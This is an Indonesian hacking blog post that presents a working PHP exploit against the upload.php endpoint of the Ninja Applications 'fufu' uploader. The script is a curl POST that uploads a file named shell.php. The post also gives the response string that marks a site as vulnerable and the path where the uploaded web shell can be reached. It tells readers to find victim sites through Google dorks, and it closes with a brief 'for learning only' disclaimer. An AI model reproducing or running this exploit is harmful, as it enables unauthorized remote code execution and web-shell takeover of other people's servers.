Exploit Ninja Application Remote Code Vulnerability

By Rabu, 16 September 2015 Add Comment
Exploit Ninja Application Remote Code Vulnerability - Hai Semua, selamat datang di blog Noob1t4, Pada Artikel yang kalian baca kali ini dengan judul Exploit Ninja Application Remote Code Vulnerability, kami telah mempersiapkan artikel ini dengan baik untuk kalian baca dan ambil informasi didalamnya. mudah-mudahan isi postingan yang kami tulis ini dapat kalian pahami. baiklah, selamat membaca.

Kali ini saya akan share exploit yang lumayan poluler yaitu Exploit Ninja Application Remote Code Vulnerability. Oke langsung saja ke tutorial.

Google dorks : use your brain !

Vuln Code : {“jsonrpc” : “2.0”, “result” : null, “id” : “id”, “cleanFileName” : “”}

Victim : /ninja-applications/fufu/controllers/uploader/upload.php


Exploit Code :



<?php

$url = “http://localhost/ninja-applications/fufu/controllers/uploader/upload.php”; 

$post = array

(

“file” => “@shell.jpg”,

“name” => “shell.php”

);

$ch = curl_init (“$url”);

curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);

curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);

curl_setopt ($ch, CURLOPT_USERAGENT, “Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0”);

curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);

curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);

curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);

curl_setopt ($ch, CURLOPT_POST, 1);

@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);

$data = curl_exec ($ch);

curl_close ($ch);

echo $data;

?>





Shell access : localhost/uploads/temp/fufu(random code)shell.php . ex: fufu55f9730a4ea30sh.php




Pertama, dorking dulu di google.


Lalu cek urlnya : http://localhost/ninja-applications/fufu/controllers/uploader/upload.php






Jika ada vuln code seperti di ss, berarti situs tersebut bisa dieksekusi.


Tinggal di exploit dengan exploit code php diatas. Gunakan xampp di Windows atau langsung di Linux.






Tinggal diakses shell nya sesuai nama yang tertera di terminal.




Mudah bukan ? Sekian tutor kali ini semoga bermanfaat. 🙂


Sumber http://noob1t4.blogspot.com/

Artikel Menarik Lainnya:




Sekian Artikel Exploit Ninja Application Remote Code Vulnerability.
Terima kasih telah membaca artikel Exploit Ninja Application Remote Code Vulnerability, mudah-mudahan bisa memberi manfaat untuk kalian semua. Baiklah, sampai jumpa di postingan artikel lainnya.


Semua artikel tutorial di blog ini hanya untuk sebatas Pembelajaran dan Pengetahuan saja, jika kalian meyalahgunakan tutorial di blog ini, itu bukan tanggung jawab saya. Terima kasih sudah berkunjung ke blog Noob1t4, saya harap agan berkunjung kembali kesini

0 Response to "Exploit Ninja Application Remote Code Vulnerability"

Posting Komentar

Langganan: Posting Komentar (Atom)

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel